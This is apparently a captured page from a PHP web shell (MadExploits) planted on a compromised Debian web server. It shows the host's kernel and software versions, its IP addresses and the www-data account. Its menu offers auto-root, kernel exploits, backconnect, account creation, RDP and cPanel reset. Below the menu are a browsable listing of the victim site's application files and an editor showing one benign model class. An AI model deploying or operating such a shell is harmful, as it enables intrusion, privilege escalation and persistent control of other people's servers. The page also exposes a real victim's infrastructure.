Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.138.113.44
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
protected /
Common /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
KAdminPage.php
346
B
-rw-r--r--
KApplication.php
313
B
-rw-r--r--
KAuthor.php
1.3
KB
-rw-r--r--
KBooleanColumn.php
1.57
KB
-rw-r--r--
KClass.php
1.85
KB
-rw-r--r--
KClassGiver.php
1.04
KB
-rw-r--r--
KClassMaterialFile.php
2.81
KB
-rw-r--r--
KContentItem.php
3.3
KB
-rw-r--r--
KDuty.php
2.82
KB
-rw-r--r--
KImage.php
6.6
KB
-rw-r--r--
KImageManager.php
1.75
KB
-rw-r--r--
KNewsItem.php
4.2
KB
-rw-r--r--
KPage.php
1.59
KB
-rw-r--r--
KPaper.php
13.88
KB
-rw-r--r--
KScheduleEntry.php
3.66
KB
-rw-r--r--
KUser.php
1.55
KB
-rw-r--r--
KUserRecord.php
10.81
KB
-rw-r--r--
PEmailer.php
445
B
-rw-r--r--
PErrorHandler.php
4.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : KClassMaterialFile.php
<?php class KClassMaterialFile extends TActiveRecord { const TABLE='ifk_classmaterialfiles'; private $_id; private $_user_id; private $_class_id; private $_filename; private $_name; private $_visible; private $_added_date; public function getId() {return $this->_id;} public function setId($value) {$this->_id = TPropertyValue::ensureInteger($value);} public function getUser_id() {return $this->_user_id;} public function setUser_id($value) {$this->_user_id = TPropertyValue::ensureInteger($value);} public function getClass_id() {return $this->_class_id;} public function setClass_id($value) {$this->_class_id = TPropertyValue::ensureInteger($value);} public function getFilename() {return $this->_filename;} public function setFilename($value) {$this->_filename = TPropertyValue::ensureString($value);} public function getName() {return $this->_name;} public function setName($value) {$this->_name = TPropertyValue::ensureString($value);} public function getVisible() {return $this->_visible;} public function setVisible($value) {$this->_visible = TPropertyValue::ensureBoolean($value);} public function getAdded_date() {return $this->_added_date;} public function setAdded_date($value) {$this->_added_date = TPropertyValue::ensureString($value);} public function isCorrect() { return file_exists(Prado::getApplication()->Parameters['CLASSMATERIALS_PATH']."/".$this->getFilename()); } public function getUrl() { return Prado::getApplication()->Parameters['CLASSMATERIALS_URL']."/".$this->getFilename(); } public function getIconLink($use_filename_as_name = true) { if ($this->isCorrect()) { $link = "<a href='".$this->getUrl()."' target='_blank'>".(($use_filename_as_name)?$this->Filename:$this->Name)."</a>"; $p = new KAdminPage; switch(strtolower(mime_content_type(Prado::getApplication()->Parameters['CLASSMATERIALS_PATH']."/".$this->getFilename()))) { case 'application/pdf': $iconfile = $p->publishAsset('assets/pdf.gif'); break; case 'application/msword': $iconfile = $p->publishAsset('assets/ms-word.gif'); break; case 'application/zip': case 'application/x-zip': case 'application/x-rar-compressed': $iconfile = $p->publishAsset('assets/zip-file.gif'); break; default: $iconfile = $p->publishAsset('assets/file.gif'); break; }; $icon = "<img src='".$iconfile."'>"; $iconlink = $icon.' '.$link; return $iconlink; } } public static function finder($className=__CLASS__) { return parent::finder($className); } public function delete() { if (file_exists(Prado::getApplication()->Parameters['CLASSMATERIALS_PATH']."/".$this->Filename)) unlink(Prado::getApplication()->Parameters['CLASSMATERIALS_PATH']."/".$this->Filename); parent::delete(); } }
Close